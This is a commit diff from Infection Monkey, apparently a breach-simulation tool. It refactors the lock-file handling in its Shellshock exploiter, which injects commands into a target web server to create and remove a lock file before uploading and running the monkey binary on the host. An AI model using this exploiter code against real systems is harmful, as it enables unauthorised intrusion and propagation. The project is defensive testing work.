update

2019-09-07 07:14:11 +07:00 · 2019-09-07 07:14:11 +07:00 · 7b0bf71279
parent ee10ca9050
commit 7b0bf71279
2 changed files with 11 additions and 28 deletions
--- a/monkey/infection_monkey/exploit/init.py
+++ b/monkey/infection_monkey/exploit/init.py
@ -75,17 +75,7 @@ class HostExploiter(object):
        """
        powershell = True if "powershell" in cmd.lower() else False
        self.exploit_info['executed_cmds'].append({'cmd': cmd, 'powershell': powershell})
-
-    def _try_lock(self, create_file_fn, path):
-        """
-        Create temporary file on target machine to avoid collision of long-running exploiters
-        :return: True if no other monkey is running same exploit
-        """
-        return create_file_fn(path)
-
-    def _exit_lock(self, remove_file_fn, path):
-        remove_file_fn(path)
-
+        

 from infection_monkey.exploit.win_ms08_067 import Ms08_067_Exploiter
 from infection_monkey.exploit.wmiexec import WmiExploiter
--- a/monkey/infection_monkey/exploit/shellshock.py
+++ b/monkey/infection_monkey/exploit/shellshock.py
@ -109,9 +109,8 @@ class ShellShockExploiter(HostExploiter):
                LOG.info("Can't find suitable monkey executable for host %r", self.host)
                return False

-            if not self._try_lock(create_file_fn=self._create_lock_file(exploit, url, header),
-                                  path=LOCK_HELPER_FILE):
-                LOG.info("Host %s was already infected under the current configuration, done" % self.host)
+            if not self._create_lock_file(exploit, url, header):
+                LOG.info("Another monkey is running shellshock exploit")
                return True

            http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
@ -130,8 +129,7 @@ class ShellShockExploiter(HostExploiter):
            http_thread.join(DOWNLOAD_TIMEOUT)
            http_thread.stop()

-            self._exit_lock(remove_file_fn=self._remove_lock_file(exploit, url, header),
-                            path=LOCK_HELPER_FILE)
+            self._remove_lock_file(exploit, url, header)

            if (http_thread.downloads != 1) or (
                        'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
@ -192,20 +190,15 @@ class ShellShockExploiter(HostExploiter):
        return False,

    def _create_lock_file(self, exploit, url, header):
-        def f(filepath):
-            if self.check_remote_file_exists(url, header, exploit, filepath):
-                LOG.info("Another monkey is running shellshock exploit")
-                return False
-            cmd = exploit + 'echo AAAA > %s' % filepath
-            self.attack_page(url, header, cmd)
-            return True
-        return f
+        if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE):
+            return False
+        cmd = exploit + 'echo AAAA > %s' % LOCK_HELPER_FILE
+        self.attack_page(url, header, cmd)
+        return True

    def _remove_lock_file(self, exploit, url, header):
-        def f(filepath):
-            cmd = exploit + 'rm %s' % filepath
-            self.attack_page(url, header, cmd)
-        return f
+        cmd = exploit + 'rm %s' % LOCK_HELPER_FILE
+        self.attack_page(url, header, cmd)

    @staticmethod
    def attack_page(url, header, attack):